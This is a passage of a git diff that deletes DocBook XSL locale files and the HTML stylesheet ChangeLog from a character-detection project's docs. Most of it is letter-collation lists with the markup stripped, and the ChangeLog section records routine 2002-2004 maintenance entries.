- D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/zh_cn.xml b/chardet/docs/docbook/xsl/common/zh_cn.xml deleted file mode 100644 index 95da718..0000000 --- a/chardet/docs/docbook/xsl/common/zh_cn.xml +++ /dev/null @@ -1,584 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 其它 - A - a - B - b - C - c - D - d - E - e - F - f - G - g - H - h - I - i - J - j - K - k - L - l - M - m - N - n - O - o - P - p - Q - q - R - r - S - s - T - t - U - u - V - v - W - w - X - x - Y - y - Z - z - - diff --git a/chardet/docs/docbook/xsl/common/zh_tw.xml b/chardet/docs/docbook/xsl/common/zh_tw.xml deleted file mode 100644 index e7a5d63..0000000 --- a/chardet/docs/docbook/xsl/common/zh_tw.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á - Â - â - Ã - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/html/ChangeLog b/chardet/docs/docbook/xsl/html/ChangeLog deleted file mode 100644 index 4aa8aa2..0000000 --- a/chardet/docs/docbook/xsl/html/ChangeLog +++ /dev/null @@ -1,1854 +0,0 @@ -2004-02-13 Robert Stayton - - * biblio.xsl, glossary.xsl, index.xsl: Removed obsolete component.title.mode templates. - -2004-01-29 Norman Walsh - - * autotoc.xsl: Use titleabbrev in ToC - - * biblio.xsl: Support info in bibliography mode; support personblurb as an alternative to authorblurb - - * component.xsl: Support 'info' - - * docbook.xsl: Support DocBook NG by way of the following hack: if we find an NG document, do an identity transform to throw away the NG namespace and then process the result. Requires exsl:node-set(). - - * docbookng.xsl: New file. - - * inline.xsl: Support 'tag' as a synonym for 'sgmltag' - - * lists.xsl: Make simpara in callout magic; don't output a p inside the li. Sigh. - - * table.xsl: Support bgcolor and class dbhtml PIs on table rows - - * titlepage.xsl: Support personblurb as a synonym for authorblurb - - * xref.xsl: Support xref to personblurb the same way as authorblurb - -2004-01-08 Norman Walsh - - * biblio.xsl: Initial support for bibliolist - - * table.xsl: Abort if there's no @cols - -2003-12-31 Jirka Kosek - - * autoidx-ng.xsl: New file. - -2003-12-30 Robert Stayton - - * biblio.xsl, xref.xsl: Changed document($bibliography.collection) - to document($bibliography.collection,.) so it will - look in the current directory instead of - the stylesheet directory. - - * graphics.xsl: Fixed test for graphic inside inlineequation. - - * xref.xsl: Added refsection to mode="xref-to" to support xref to refsection. - -2003-12-15 Norman Walsh - - * chunk-common.xsl: Fix ugly performance problem in footer.navigation (thanks again Guillaume du Bourguet) - -2003-12-12 Robert Stayton - - * inline.xsl: Fix bug [ 841586 ] id-attibute in firstterm prohibits link to glossary. - -2003-12-09 Robert Stayton - - * autotoc.xsl: Omit setindex from TOC if $generate.index = 0 - -2003-12-05 Robert Stayton - - * table.xsl: Now colwidth="*" treated as colwidth="1*" for tablecolumns extension. - -2003-12-01 Robert Stayton - - * lists.xsl: Processing of listitems now processes and preserves order of comments and PIs. - -2003-11-30 Robert Stayton - - * autoidx.xsl, changebars.xsl, chunk-code.xsl, chunk-common.xsl, chunk.xsl, chunker.xsl, chunkfast.xsl, chunktoc.xsl, html-rtf.xsl, htmltbl.xsl, maketoc.xsl, manifest.xsl, oldchunker.xsl, onechunk.xsl, profile-chunk.xsl, profile-onechunk.xsl, task.xsl: - Added CVS $Id: ChangeLog,v 1.1.1.1 2004/06/22 02:09:57 f8dy Exp $ comments. - -2003-11-29 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added new HTML Help parameters from patches by W. Borgert - -2003-11-25 Norman Walsh - - * chunk-common.xsl: Experimental fix for some xref linking issues in cases where dbhtml 'dir' is used. - -2003-11-24 Norman Walsh - - * chunk-common.xsl: Fix ugly performance problem with chunking (thanks Guillaume du Bourguet) - - * glossary.xsl: Fix bugs in formatting of glosslist - -2003-11-23 Norman Walsh - - * inline.xsl: Support code inline - -2003-11-02 Robert Stayton - - * chunk-common.xsl: Moved call to user.head.content to just before - to give the user the last word. - -2003-10-23 - - * chunk-code.xsl: Remove index from Next and Previous when - $generate.index = 0. - -2003-10-03 Norman Walsh - - * lists.xsl: Support stepalternatives - -2003-09-28 Norman Walsh - - * index.xsl: Handle indexdiv/title properly - - * lists.xsl: Bug #779655: fix PIs and comments in segmented lists - -2003-09-27 Norman Walsh - - * block.xsl, qandaset.xsl: Bug #687783: attempt rudimentary support for blockinfo - -2003-09-23 Jirka Kosek - - * Makefile.param, html.xsl, manifest.xsl, param.ent, param.xweb: - Added new parameter manifest.in.base.dir which can be used to place manifest file and also project files for HTML Help and Eclipse Help into base.dir. This improvement also fixes bug (feature) #662955. - -2003-08-29 Robert Stayton - - * autotoc.xsl: Fixed bug in new toc.line template. - - * chunker.xsl: No change, just new timestamp so html2xhtml.xsl will - update it when generate the xhtml version. - -2003-08-29 Norman Walsh - - * inline.xsl: Rudimentary support for @dir - -2003-08-27 Norman Walsh - - * docbook.xsl, formal.xsl, htmltbl.xsl, table.xsl: Reorganize code for consistency with FO; check for obviously broken tables - - * docbook.xsl, task.xsl: Support task - - * formal.xsl, table.xsl: Support HTML tables - - * inline.xsl: Support uri - - * verbatim.xsl: Support startinglinenumber and continuation on verbatim environments - -2003-08-07 Robert Stayton - - * callout.xsl: Fixed callout numbering bug when inside an inline. - -2003-08-04 Robert Stayton - - * qandaset.xsl: Fixed logic for turning on qandaset/qandadiv TOCs with - generate.toc param or dbhtml toc PI. - -2003-08-01 Robert Stayton - - * titlepage.xsl: Moved email in "author" template to appear after the - affiliation. - -2003-07-31 Jirka Kosek - - * Makefile.param, param.xweb: Added missing parameter - -2003-07-31 Robert Stayton - - * qandaset.xsl: Fixed extraneous dot when defaultlabel=qanda. - - * qandaset.xsl: Removed extraneous dot from question in autotoc mode as well - when defaultlabel=qanda. - -2003-07-25 Robert Stayton - - * param.ent: Added insert.xref.page.number with value of zero to - ensure that xrefstyle attributes don't try to generate - a page number reference for HTML output. This parameter - does not show up in the HTML doc because it is not - to be changed. - - * param.ent, param.xweb: Added xref.label-title.separator, xref.label-page.separator, - and xref.title-page.separator parameters to support the - xrefstyle select: feature. - -2003-07-22 Jirka Kosek - - * Makefile.param, param.ent, param.xweb: Added support for Eclipse Help Platform - - * html.xsl: Moving template to place where it can be reused - -2003-07-21 Robert Stayton - - * autotoc.xsl: Added a toc.line template to handle formatting of each - line in a TOC, similar to that in the FO side. - Makes customizing HTML toc easier. - -2003-07-17 Robert Stayton - - * graphics.xsl: Image depth calculation was using nominal.image.width - when it should have been using nominal.image.depth. - -2003-07-10 Robert Stayton - - * lists.xsl: Added no-op templates for list titleabbrev elements. - -2003-07-08 Robert Stayton - - * maketoc.xsl: Handle refentry with mode="toc" here since refentry mode="toc" - in autotoc.xsl does not use subtoc. This fixes bug #743612. - -2003-06-25 Robert Stayton - - * block.xsl: Process formalpara/title to variable so can test for last - char of any generated text. - -2003-06-23 Robert Stayton - - * refentry.xsl: Added param conditional="0" to call to 'anchor' template - for refsections, so those sections are - valid targets for indexterm links as expected by autoidx.xsl. - -2003-06-23 Jirka Kosek - - * titlepage.xsl: DocBook 4.2 allows e-mail address inside author element and now is this feature supported also by stylesheets. Not sure whether this solution is the best, but it works. - -2003-06-22 Robert Stayton - - * docbook.xsl, param.ent, param.xweb: Added draft.mode parameter. - - * graphics.xsl: Fix bug #733406: ignore.image.scaling misses contentwidth. - -2003-06-22 Norman Walsh - - * param.xweb: Added fragment for draft.mode - -2003-06-21 Norman Walsh - - * block.xsl: Make attribution a div not a span - - * chunk-code.xsl: Test part/glossary for chunking - - * html-rtf.xsl: Added remove-empty-div mode - -2003-06-19 Robert Stayton - - * autotoc.xsl: Fixed bug 743752 where generate.index=0 and empty index - left a dead Index link in the TOC. - - * biblio.xsl: Removed duplicate templates for biblioid. - - * onechunk.xsl, profile-onechunk.xsl: Reset suppress.navigation parameter to 1 to turn off useless nav headers. - -2003-05-28 Robert Stayton - - * sections.xsl: Fixed bridgehead renderas levels to match section level. - This was missed when the section levels were corrected - a couple of releases back. - -2003-05-18 Norman Walsh - - * .cvsignore: Ignore profile-chunk-code.xsl - -2003-05-12 Jirka Kosek - - * Makefile, Makefile.param, profile-chunk.xsl, profile-onechunk.xsl: - Fixed profiling to work with modified chunking code - -2003-05-08 Norman Walsh - - * autotoc.xsl: Support glossary, bibliography, and index in components - - * block.xsl: Use a div for the attribution so that it can be styled better with CSS - - * chunk-code.xsl, chunk.xsl: Refactored chunking code so that customization of chunk algorithm and chunk elements is more practical - - * param.xweb: Added fragref for admon.textlabel - -2003-05-07 Robert Stayton - - * admon.xsl: admon.textlabel turned off still outputs a note's title child. - - * admon.xsl: Added admon.textlabel parameter to enable turning off - the text label such as Note, Warning. - - * param.ent, param.xweb: Fixed name bug in admon.textlabel. - -2003-04-14 Jirka Kosek - - * Makefile.param, docbook.xsl: Initial support for timestamp PI. From now you can use to get current datetime in your document. More features like localization and exctracting date from CVS tag will follow. - -2003-04-13 Norman Walsh - - * table.xsl: A few bug fixes for the colsep/rowsep code - -2003-04-12 Norman Walsh - - * callout.xsl: Support coref - - * ebnf.xsl: Support ebnf.assignment and ebnf.statement.terminator - - * graphics.xsl: Support textobject/phrase on inlinemediaobject - - * inline.xsl: Support beginpage (does nothing; see TDG) - - * lists.xsl: Support 'start' PI on ordered lists - - * param.ent, param.xweb: Added ebnf.assignment and ebnf.statement.terminator - - * table.xsl: Support bgcolor (instead of entry-bgcolor) PI in table cells; make sure rowsep and colsep don't have any effect on the last row or column - -2003-03-26 Michael Smith - - * Makefile: wdocbook.xsl obsoleted by w2docbook.xsl, updated globally - -2003-03-25 Michael Smith - - * Makefile: reverting wdocbook.xsl -> w2docbook.xsl changes - -2003-03-24 Michael Smith - - * Makefile: wrong filename '../../litprog/wdocbook.xsl' broke build, fixed - -2003-03-20 Norman Walsh - - * docbook.xsl: Added } to background-image css - -2003-02-28 Robert Stayton - - * glossary.xsl: Added warning when $glossary.collection is not blank, but - it cannot open the specified file. - -2003-02-26 Robert Stayton - - * qandaset.xsl: Fixed test of $toc PI to turn on qandaset TOC. - -2003-02-21 Robert Stayton - - * sections.xsl: Added process.chunk.footnotes to sect2 through 5 - to fix bug of missing footnotes when chunk level - greater than 1. - -2003-02-17 Norman Walsh - - * sections.xsl: Support subtitle class on section headings (for subtitles, naturally) - -2003-02-08 Robert Stayton - - * glossary.xsl: Fixed bug in glossary.xsl where glosssee and glossseealso were - using mode="xref" instead of mode="xref-to". - -2003-02-07 Jirka Kosek - - * Makefile.param, autotoc.xsl, param.ent, param.xweb: Added paramater toc.max.depth which controls maximal depth of ToC as requested by PHP-DOC group. - -2003-02-04 Robert Stayton - - * lists.xsl: Added support for elements between variablelist and first - varlistentry since DocBook 4.2 supports that now. - - * lists.xsl: Exempted titleabbrev from preamble processing in lists, - and fixed variablelist preamble code to use the same syntax - as the other lists. - -2003-01-30 Robert Stayton - - * qandaset.xsl: Corrected several references to parameter $qanda.defaultlabel - that were missing the "$". - -2003-01-28 Norman Walsh - - * inline.xsl: Check for glossterm.auto.link when linking firstterms; don't output gl. prefix on glossterm links - -2003-01-22 Norman Walsh - - * graphics.xsl: Fix bugs in presentation of graphic width/height - - * inline.xsl: Add class attributes to inline elements - - * xref.xsl: Format chapter and appendix titles consistently in xrefs - -2003-01-20 Norman Walsh - - * autoidx.xsl: Bug #663331: add article to section entity - - * biblio.xsl: Bug #640762: Support new biblioentry elements - - * chunk-common.xsl: Bug #648473: don't output the html.ext when using dbhtml filenames - - * footnote.xsl: Support {table.}footnote.number.{format,symbols} - - * glossary.xsl: Support glossentry.show.acronym - - * param.ent, param.xweb: Support xref.with.number.and.title - - * param.ent, param.xweb: Added {table.}footnote.number.{format,symbols}, entry.propagates.style, and glossentry.show.acronym - - * sections.xsl: Don't force a ToC for refentrys - - * table.xsl: Support entry.propagates.style - - * titlepage.templates.xml: SIGNIFICANT changes to the titlepage template setup. See RELEASE-NOTES. - - * xref.xsl: Handle xref to glossentry - -2003-01-17 Norman Walsh - - * lists.xsl: Output ul list type only if css.decoration is non-zero - - * xref.xsl: Remove duplicated IDs when endterm is used on xref - -2003-01-12 Norman Walsh - - * autoidx.xsl: Make sure that indexdivs are properly scoped. I've done this by adding a test to suppress the division if it contains no terms. It seems like there might be a better way, but I can't see it just at the moment - -2003-01-08 Robert Stayton - - * xref.xsl: In olink, use document($target.database.document, /) so the - olink database location is relative to the document, not - the stylesheet. - -2003-01-06 Robert Stayton - - * autoidx.xsl, index.xsl: Removed unnecessary generate-index-from-terms template in - favor of generate-index with scope parameter. - -2003-01-02 Norman Walsh - - * autoidx.xsl, index.xsl: Rework indexing to avoid XSLT limitation/Saxon bug with context dependencies; finish porting Bob's changes from FO to HTML - - * index.xsl, titlepage.templates.xml, titlepage.xsl: Support setindex (there were all sorts of things wrong with it) - -2003-01-01 Norman Walsh - - * autoidx.xsl, index.xsl: Make index elements always index the book that contains them (if there is one, otherwise the whole document); setindex always indexes the whole document - - * autotoc.xsl: Support List of Procedures - - * formal.xsl, xref.xsl: Use titleabbrev instead of title in xrefs - - * graphics.xsl: Support ignore.image.scaling parameter; fix bug where 'center' is output for align on img - - * param.ent, param.xweb: New parameters - - * sections.xsl: Don't output section IDs twice when formatting subtitles - -2002-12-31 Norman Walsh - - * callout.xsl: Whitespace - - * graphics.xsl: Support alt text on mediaobjectco - - * inline.xsl: Make lineannotations italic - -2002-12-28 Norman Walsh - - * xref.xsl: Now that xrefstyle is official; make it take priority even when use.role.as.xrefstyle is non-zero. - - * xref.xsl: Make endterm on xref higher priority than xreflabel on the target - -2002-12-18 Robert Stayton - - * autoidx.xsl: Sorts were being done on primary entries, but without - folding upper and lower case together. Now it does the folding. - - * graphics.xsl: Now uses select.mediaobject.index for selecting mediaobject. - Also puts align attribute value on
    as the comment says - it should. - -2002-12-17 Jirka Kosek - - * Makefile.param: Fixed build problems with new parameters. - -2002-12-17 Robert Stayton - - * math.xsl: Changed selection of mediaobject to be more consistent using - a separate select.mediaobject.index template. Also added - text-align to block containing external-graphic in fo output. - -2002-12-17 Jirka Kosek - - * param.xweb: Fixed build problems with new parameters. - -2002-12-13 Robert Stayton - - * glossary.xsl: Handles missing otherterm targets in glosssee and glossseealso. - -2002-12-06 Robert Stayton - - * block.xsl: Fixed epigraph template to process all the permitted - children, not just para. - - * graphics.xsl, param.ent, param.xweb: Enabled selection of imageobject based on role attribute. - -2002-12-04 Robert Stayton - - * autotoc.xsl, component.xsl, sections.xsl: Added component.toc.separator and section.toc.separator as - emtpy templates for customization of transition - from TOC to first content. - -2002-11-29 Norman Walsh - - * lists.xsl: Make opencircle=circle in itemizedlist marks - -2002-11-25 Robert Stayton - - * sections.xsl: Made subtitles in sections scale to proper heading level. - -2002-11-16 Norman Walsh - - * admon.xsl: Align titles on graphical admonitions - - * biblio.xsl, xref.xsl: Support bibliosource; improve numbered bibliography entries and cross-references to them - -2002-11-15 Norman Walsh - - * table.xsl: Insignificant tweak - -2002-11-14 Norman Walsh - - * biblio.xsl: Use xreflabel (if it's present) on bibliography entries - - * component.xsl: Article appendix titles should be top-level titles - - * refentry.xsl: Handle nested refsections - - * table.xsl: Support entrytbl - - * xref.xsl: Whitespace - -2002-11-01 Norman Walsh - - * inline.xsl: Output anchors for author/editor/othercredit names - - * lists.xsl: Output anchors for simplelist members - -2002-10-31 Norman Walsh - - * autoidx.xsl: Support spanning index terms (endofrange/startref) - -2002-10-20 Norman Walsh - - * inline.xsl: Bug #619474: support errortext element - -2002-10-19 Norman Walsh - - * block.xsl, component.xsl, division.xsl, refentry.xsl, sections.xsl: - Support output of language attribute - - * inline.xsl: Support output of language attribute on foreignphrase and fix bug in glossterm linking - -2002-10-09 Robert Stayton - - * xref.xsl: Fixed bug in lookup of olink database document baseuri - attribute for case of no site map. - -2002-10-08 Norman Walsh - - * formal.xsl: Use table 'tabstyle' attribute for div class - -2002-10-06 Norman Walsh - - * chunk-common.xsl: Simplify chunk-element-content; no semantic differences - - * chunk.xsl: Reworked chunking for downstream customization; will break any existing customization layer that changes the chunking algorithm - -2002-10-04 Norman Walsh - - * autotoc.xsl, component.xsl, sections.xsl: Support optional titles on ToCs - - * lists.xsl: Bug #615464: fix typo in compact list spacing - - * param.ent, param.xweb, table.xsl: Made separate parameters for table frame and table cell border properties - - * synop.xsl: Bug #617717: remove spurious hash in anchor name - -2002-10-04 Jirka Kosek - - * titlepage.xsl: Fixed bug #618600. Address is now displayed verbatim also on titlepages. - -2002-10-02 Norman Walsh - - * lists.xsl: Support continuation of orderedlists and inherited numeration in FO - -2002-10-01 Robert Stayton - - * sections.xsl: Changed section.level template to return a number that matches - the section level (sect1 = 1, etc.), and changed other - templates to compensate for the change, so the output - should be the same as before. - -2002-09-27 Norman Walsh - - * autoidx.xsl: Bug #496294: don't index endofrangeentries. They're no longer indexed, but they aren't handled quite right yet either, they don't generate ranges - - * autotoc.xsl: Properly support bridgehead.in.toc parameter - - * biblio.xsl: Related to bug #583282: don't duplicate footnotes in bibliographys either - - * block.xsl, titlepage.xsl: Bug #582192: support revdescription and improve effectiveness of html-rtf by extending the number of places where its used - - * component.xsl: Bug #596599: TOC for article/appendix in chunked HTML - - * docbook.xsl: Make sure chunk always returns zero if we're not chunking - - * formal.xsl: Bug #497603: fixed and added default.float.class - - * glossary.xsl: Bug #583282: footnote duplicated in glossary footer - - * graphics.xsl: Bug #516859: added default.image.width - - * index.xsl: Related to bug #583282: don't duplicate footnotes in indexes either - - * param.ent, param.xweb: Use new parameters - - * synop.xsl: Total rework of funcsynopsis code; now supports a 'tabular' presentation style for 'wide' prototypes; see funcsynopsis.tabular.threshold - -2002-09-20 Norman Walsh - - * changebars.xsl: Address Bug #610660: use system.head.content instead of user.head.content; tone down the intensity of the colors a bit - - * chunk-common.xsl: Call system.head.content in html.head - - * docbook.xsl: Add context to error message about a missing template - - * docbook.xsl: Address Bug #610660: Added system.head.content so that stylesheets can output things before the users css.stylesheet (for example). Also added a title parameter to head.content - - * graphics.xsl: Call the *.head.content templates when writing out long description chunks - - * synop.xsl: Bug #605150: process arg correctly even when it's in a group - - * titlepage.xsl: Call the *.head.content templates when writing out legalnotice chunks - - * titlepage.xsl: Bug #607725: make sure legalnoticelink is correct even when chunking to a different html.dir - -2002-09-18 Norman Walsh - - * graphics.xsl: Use CSS to set viewport characteristics if css.decoration is non-zero, use div instead of p for making graphic a block element; make figure titles the default alt text for images in a figure - - * html-rtf.xsl: Handle XHTML RTFs more completely - -2002-09-17 Norman Walsh - - * chunk.xsl: Use local URIs for importing docbook.xsl and chunk-common.xsl - - * qandaset.xsl: Added default table summary to qandaset tables - -2002-09-16 Norman Walsh - - * chunk.xsl, chunkfast.xsl: Attempt to make chunking faster; chunkfast is still experimental - -2002-09-15 Norman Walsh - - * autoidx.xsl: Support indexing in webpages (website DTD). In the long run, this probably isn't a good strategy... - -2002-09-06 Norman Walsh - - * admon.xsl: Output table summary and img alt for graphical admonitions - - * docbook.xsl: Whitespace changes - - * param.ent, param.xweb: Use the new l10n.* parameters - -2002-09-04 Norman Walsh - - * chunk-common.xsl: Ignore dbhtml dir if the section isn't a chunk - - * chunk.xsl: Make sure chunked ToC/LoT goes in the right base.dir - - * component.xsl: Allow generate.toc parameter to control ToC in article/appendixes - - * graphics.xsl: Use the graphicsize.extension parameter - -2002-09-03 Norman Walsh - - * refentry.xsl: Do something reasonable with refsection; this still needs work - - * table.xsl: Make sure row-level colsep and rowsep values are 'inherited' onto missing cells - -2002-08-28 Norman Walsh - - * table.xsl: Make inherited attributes work for 'missing' table cells - -2002-08-26 Norman Walsh - - * chunk.xsl, param.ent, param.xweb: Made chunk.tocs.and.lots a proper parameter - -2002-08-25 Jirka Kosek - - * autoidx.xsl: Fixed bug #496281. Refentry is now recognized as target for links from index. - -2002-08-22 Jirka Kosek - - * Makefile.param: Index can be alternatively created using HHK file from now. This allows see-also processing and index terms also points to their exact location. - -2002-08-22 Norman Walsh - - * autoidx.xsl: Format see/seealso entries correctly - - * autotoc.xsl, chunk-common.xsl, chunk.xsl, component.xsl, division.xsl: - Rework(ing) ToC/LoT generation to support chunking the ToC/LoT; don't output empty rows in navigation tables - -2002-08-22 Jirka Kosek - - * param.ent, param.xweb: Index can be alternatively created using HHK file from now. This allows see-also processing and index terms also points to their exact location. - -2002-07-29 Robert Stayton - - * lists.xsl: Added valign="top" attribute to the element - for variablelist term column. I was getting vertically - centered alignment for the term. - -2002-07-19 Norman Walsh - - * biblio.xsl, inline.xsl, param.ent, param.xweb: Support menuchoice.menu.separator, menuchoice.separator, and bibliography.numbered - -2002-07-18 Norman Walsh - - * block.xsl, lists.xsl, param.ent, param.xweb: Added support for para.propagates.style - - * lists.xsl: Use tr.attributes - - * param.ent, param.xweb: Added html.cellpadding and html.cellspacing - - * table.xsl: Added tr.attributes named template (for odd-row coloring and such) and html.cellpadding and html.cellspacing for table defaults - -2002-07-16 Norman Walsh - - * inline.xsl: When emphasis propagates its role attribute as the HTML span class and a role is provided, don't use - -2002-07-16 Robert Stayton - - * xref.xsl: 